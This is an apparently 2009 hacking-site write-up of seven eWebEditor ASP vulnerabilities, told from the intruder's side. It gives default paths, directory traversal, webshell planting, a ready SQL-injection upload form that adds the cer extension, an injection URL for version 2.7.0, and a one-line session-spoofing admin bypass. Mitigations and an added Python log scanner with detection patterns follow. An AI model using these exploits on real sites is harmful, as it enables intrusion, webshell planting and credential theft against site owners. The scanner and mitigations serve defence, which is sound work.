Analysis of the ASP version of the eWebEditor online editor - vulnerability warning - the black bar safety net

ID MYHACK58:62200924165
Type myhack58
Reporter Anonymous
Modified 2009-08-05T00:00:00


The eWebEditor editor currently comes in four variants: ASP, ASPX, PHP and JSP. Each variant has many versions, the editor is powerful and popular with users, and it is extremely widely used domestically. The vulnerabilities in the current ASP version of eWebEditor fall mainly into the following 7 points:

Defaults, directory traversal, one-sentence Trojan implantation, configuration, cookie spoofing, social engineering (following the footprints of an earlier intrusion, the

NO1. The default database path of the eWebEditor editor is generally db/ewebeditor.mdb, and the default backend path is admin_login.asp. It is best to check whether the admin_style.asp file can be accessed directly.

NO2. Directory traversal vulnerability, as follows: log in to the editor, go to Upload File Manage, and select a style directory (any directory will do). This gives: ewebeditor/admin_uploadfile.asp?id=14. Appending &dir=.. after id=14, then &dir=../.. and &dir=../../../.., shows the files of the entire website. This vulnerability is extremely harmful.

NO3. When the administrator has changed the database to an asp or asa suffix, a one-sentence Trojan can be inserted into the database, and the one-sentence Trojan client can then connect to it to obtain a webshell.

NO4. Sometimes the database has been exposed but the backend address cannot be found, which is frustrating. In that case, try viewing the style table to see whether someone else has already added a style with the asp or asa suffix; this is the so-called following-the-footprints intrusion. There are also smart administrators who simply add a "#" to the name; a social-engineering guess is worth a try, and I have taken advantage of this more than a few times. For example: db/#ewebeditor.asa, db/#ewebeditor.asp, db/#ewebeditor.mdb

NO5. Injection. The injection in 2.1.6 needs no further explanation: save the following as an HTML file, modify the action, and upload a cer Trojan directly.

<H1>ewebeditor asp version 2.1.6 upload exploits procedures----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

During an incidental intrusion I found that eWebEditor version 2.7.0 also has an injection vulnerability. A simple way to use it is http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

The default table name is eWebEditor_System and the default column names are sys_UserName and sys_UserPass. NBSI is then used to guess the values, and the injection yields the account and password.

NO6. Sometimes the administrator does not allow styles to be copied, but you can see that a style was modified during someone's earlier intrusion so that it accepts asa or similar and a shell could be uploaded through it. However, the upload/insert tool is missing and the style cannot be modified. What then? Many people might say that a toolbar can be added, but I have met cases where that was not allowed. In that case the upload.asp file in eWebEditor can be used with a locally constructed form to upload, as follows: (omitted)

NO7. Recently, attackers discovered and used an eWebEditor session spoofing vulnerability to get into the backend. Vulnerable file: Admin_Private.asp. Vulnerable statement:

<%
If Session("eWebEditor_User") = "" Then
    Response.Redirect "admin_login.asp"
    Response.End
End If
%>

The check only tests the session; it does not verify cookies or the path. Exploit: create a new amxking.asp with the following content:

<%Session("eWebEditor_User") = "11111111"%>

Access amxking.asp, and then access any backend file, for example: Admin_Default.asp

In the face of this threat, site administrators should take the following preventive measures:

1. Websites that use the eWebEditor editor should promptly change the editor's default database path and extension. Placing the database in a multi-level directory is recommended, to prevent attackers from illegally downloading it.
2. Change the editor's backend login path and the default login user name and password, to prevent attackers from getting into the admin interface.
3. Modify the statements in Upload.asp, to prevent attackers from using it to upload an ASP Trojan and gain web permissions.
4. Promptly tidy up the application extension mappings in the IIS web server configuration, to ensure that other types of files cannot run on the server hosting the website.
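To check whether a site has already been probed in the ways described in NO1, NO2, NO4, NO5 and NO7, the web server log can be scanned for the corresponding requests. The following is an added example, not part of the original advisory: the rule names, the scan function and the sample log lines are constructed, and the log is assumed to be in W3C extended format with a #Fields: header.

```python
import re
from urllib.parse import unquote_plus

# Stateless rules for the request patterns described in NO1, NO2, NO4 and NO5.
RULES = [
    ("default-db-request", re.compile(r"/db/[^/?]*ewebeditor\.(?:mdb|asp|asa)\b", re.I)),
    ("uploadfile-dir-traversal", re.compile(r"admin_uploadfile\.asp\?.*\bdir=[^&]*\.\.", re.I)),
    ("style-param-injection", re.compile(r"\.asp\?.*\bstyle=[^&]*(?:'|\bunion\b[^&]+\bselect\b)", re.I)),
]
ADMIN_PAGE = re.compile(r"/admin_(?!login)\w+\.asp$", re.I)
LOGIN_PAGE = re.compile(r"/admin_login\.asp$", re.I)

# Constructed sample log (W3C extended format); addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-08-05 10:00:01 POST /ewebeditor/admin_login.asp - 192.0.2.10 302
2009-08-05 10:00:03 GET /ewebeditor/admin_default.asp - 192.0.2.10 200
2009-08-05 10:00:04 GET /ewebeditor/ewebeditor.asp id=article_content&style=full_v200 192.0.2.10 200
2009-08-05 10:01:00 GET /ewebeditor/db/%23ewebeditor.asa - 198.51.100.7 200
2009-08-05 10:01:05 GET /ewebeditor/Admin_Default.asp - 198.51.100.7 200
2009-08-05 10:01:09 GET /ewebeditor/admin_uploadfile.asp id=14&dir=../.. 198.51.100.7 200
2009-08-05 10:01:15 POST /ewebeditor/upload.asp action=save&style=x'+union+select+1 198.51.100.7 200
"""

def scan(lines):
    """Return (client_ip, rule, url) for every suspicious request in a W3C log."""
    fields, logged_in, hits = [], set(), []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column layout is declared by the log itself
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        ip = rec.get("c-ip", "?")
        stem = unquote_plus(rec.get("cs-uri-stem", ""))
        query = rec.get("cs-uri-query", "-")
        url = stem if query == "-" else stem + "?" + unquote_plus(query)
        if LOGIN_PAGE.search(stem):
            logged_in.add(ip)              # this client at least visited the login page
        elif ADMIN_PAGE.search(stem) and ip not in logged_in:
            hits.append((ip, "admin-page-without-login", url))
        hits.extend((ip, name, url) for name, rx in RULES if rx.search(url))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(*hit, sep="\t")
```

The admin-page-without-login rule is a heuristic for NO7: it only knows whether a client requested admin_login.asp earlier in the same log, so its hits need manual review. Once the database path and login path have been changed as recommended above, the patterns should be updated to the new names.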